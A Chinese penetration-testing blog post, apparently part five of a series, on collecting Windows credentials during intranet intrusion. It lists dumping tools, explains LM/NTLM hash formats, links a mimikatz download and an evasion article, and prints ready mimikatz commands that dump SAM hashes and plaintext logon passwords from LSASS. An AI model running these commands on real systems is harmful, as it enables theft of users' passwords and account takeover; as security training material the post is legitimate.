当前位置:网站首页>内网渗透之内网信息收集(五)
内网渗透之内网信息收集(五)
2022-07-06 09:22:00 【不知名白帽】
凭证信息收集
01凭证获取工具
常用来获取windows密码的工具
- mimikatz
- wce
- pwddump7
- ophcrack
- procdump+mimikatz
- lazagne
02密码hash
LM哈希&NTLM型哈希
winodws hash:
2000 | xp | 2003 | Vista | win7 | 2008 | 2012 | |
LM | √ | √ | √ | ||||
NTLM | √ | √ | √ | √ | √ | √ | √ |
windows本地hash:
http://www.secpulse.com/archives/65256.html
windows系统下hash密码格式:
用户名称:RID:LM-HASH值:NT-HASH值
03mimikatz
mimikatz下载:
链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg
提取码:jryu
非本地交互式凭证获取
mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"
一般都是通过远程登陆靶机,在靶机内下载mimikatz
log result.txt(将结果传到txt中)
privilege::debug(提权)
token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)
获取到system用户的token
lsadump::sam(获得用户哈希)
sekurlsa::logonpasswords(获取明文密码)
mimikatz1.x版本:
privilege::debug //提升权限
inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里
@getLogonPasswords //获取密码
mimikatz免杀:
https://www.freebuf.com/articles/system/234365.html
04get-hashs
边栏推荐
- [dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
- Wechat applet
- [modern Chinese history] Chapter 6 test
- Interpretation of iterator related "itertools" module usage
- [during the interview] - how can I explain the mechanism of TCP to achieve reliable transmission
- 强化學習基礎記錄
- 实验八 异常处理
- 网络层—简单的arp断网
- 记一次猫舍由外到内的渗透撞库操作提取-flag
- 【头歌educoder数据表中数据的插入、修改和删除】
猜你喜欢
Experiment 6 inheritance and polymorphism
4. Branch statements and loop statements
使用Spacedesk实现局域网内任意设备作为电脑拓展屏
[au cours de l'entrevue] - Comment expliquer le mécanisme de transmission fiable de TCP
UGUI—Text
. Net6: develop modern 3D industrial software based on WPF (2)
Callback function ----------- callback
附加简化版示例数据库到SqlServer数据库实例中
Canvas foundation 2 - arc - draw arc
[VMware abnormal problems] problem analysis & Solutions
随机推荐
Record a penetration of the cat shed from outside to inside. Library operation extraction flag
Hackmyvm Target Series (3) - vues
Poker game program - man machine confrontation
Meituan dynamic thread pool practice ideas, open source
[three paradigms of database] you can understand it at a glance
Experiment 4 array
Force deduction 152 question multiplier maximum subarray
This time, thoroughly understand the MySQL index
MATLAB打开.m文件乱码解决办法
Beautified table style
Analysis of penetration test learning and actual combat stage
深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
[modern Chinese history] Chapter 6 test
7-7 7003 组合锁(PTA程序设计)
js判断对象是否是数组的几种方式
Hackmyvm target series (4) -vulny
The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise
Which is more advantageous in short-term or long-term spot gold investment?
HackMyvm靶机系列(3)-visions
7-15 h0161. 求最大公约数和最小公倍数(PTA程序设计)